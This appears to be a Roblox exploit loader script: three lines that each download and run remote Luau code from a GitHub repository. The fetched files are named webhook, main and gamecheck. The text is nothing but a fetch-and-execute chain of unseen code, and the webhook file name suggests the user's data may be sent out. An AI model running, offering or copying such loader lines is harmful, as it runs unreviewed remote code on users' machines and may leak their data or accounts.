-- hi

loadstring(game:HttpGet("https://raw.githubusercontent.com/imAVALIDSkidderandihateeztorters/airsoft/refs/heads/main/webhook.luau"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/imAVALIDSkidderandihateeztorters/airsoft/refs/heads/main/main.luau"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/imAVALIDSkidderandihateeztorters/airsoft/refs/heads/main/gamecheck.lua"))()
